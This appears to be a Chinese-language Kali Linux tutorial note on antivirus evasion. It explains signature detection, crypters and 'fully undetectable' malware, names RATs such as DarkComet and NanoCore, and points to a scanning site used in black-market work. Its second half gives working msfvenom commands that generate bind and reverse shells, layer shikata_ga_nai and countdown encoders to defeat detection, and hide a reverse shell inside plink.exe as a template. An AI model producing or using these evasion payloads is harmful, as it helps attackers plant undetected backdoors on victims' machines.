kali linux之免殺技術
惡意軟件:
病毒,木馬。蠕蟲,鍵盤記錄,僵屍程序,流氓軟件,勒索軟件,廣告程序
在用戶非自願的情況下安裝
出於某種惡意的目的:控制,竊取,勒索,偷窺,推送,攻擊
惡意程序最主要的防護手段:殺軟
檢測原理:基於二進制文件中特征簽名的黑名單檢測方法;基於行為的分析方法(啟發式)
免殺技術:
修改二進制文件中的特征字符---替換,擦除,修改
加密技術(crypter):
通過加密使得特征字符不可讀,從而逃避av檢測,運行時分片分段的解密執行,註入進程或av不檢查的無害文件中
防病毒軟件的檢測:
惡意程序本身的特征字符,加密器crypter的特征字符
當前現狀:
編寫私有RAT軟件,避免普遍被av所知的特征字符
使用獨有crypter軟件加密惡意程序
處事低調,盡量避免被發現,沒有能力自己編寫惡意代碼的黑客,通過直接修改特征碼的方式免殺
Fully UnDetectable是最高追求(FUD)
AV廠商:
廣泛采集樣本,盡快發現新出現的惡意程序,更新病毒庫
一般新的惡意軟件安全UD窗口期是一周左右
與惡意軟件制造者永無休止的拉鋸戰
當前現狀:
單一的av廠商的病毒庫很難達到100%覆蓋
接口被某些國家的av軟件免費利用,沒有自己的病毒庫--https://www.virustotal.com
在線多引擎查殺網站與av廠商共享信息---http://www.virscan.org
搞黑產的在線多引擎查毒站---https://nodistribute.com
常用RAT軟件:
黑暗彗星,潘多拉,NanoCore
自己編寫後門:
生成反彈shell
msfvenom -p windows/shell/bind_tcp lhost=192.168.1.12 lport=4444 -a x86 --platform win -f exe -o xxsec.exe
加密編碼反彈shell
msfvenom -p windows/shell/bind_tcp lhost=192.168.1.12 lport=4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -b ‘\x00‘ -f exe -o xx.exe
加密前後查看可讀字符串對比
比較編碼前後的檢測率
http://www.virscan.org/language/zh-cn/
利用模板隱藏shell
msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=192.168.1.12 lport=4444 -a x86 --platform win -f exe -o x.exe(未加密編碼)
msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=192.168.1.12 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 --platform win -f exe > xxx.exe( 加密編碼)
對比
軟件保護:
軟件開發商為保護版權,采用的混淆加密技術避免盜版逆向,常被惡意軟件用於免殺目的
友情鏈接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn
kali linux之免殺技術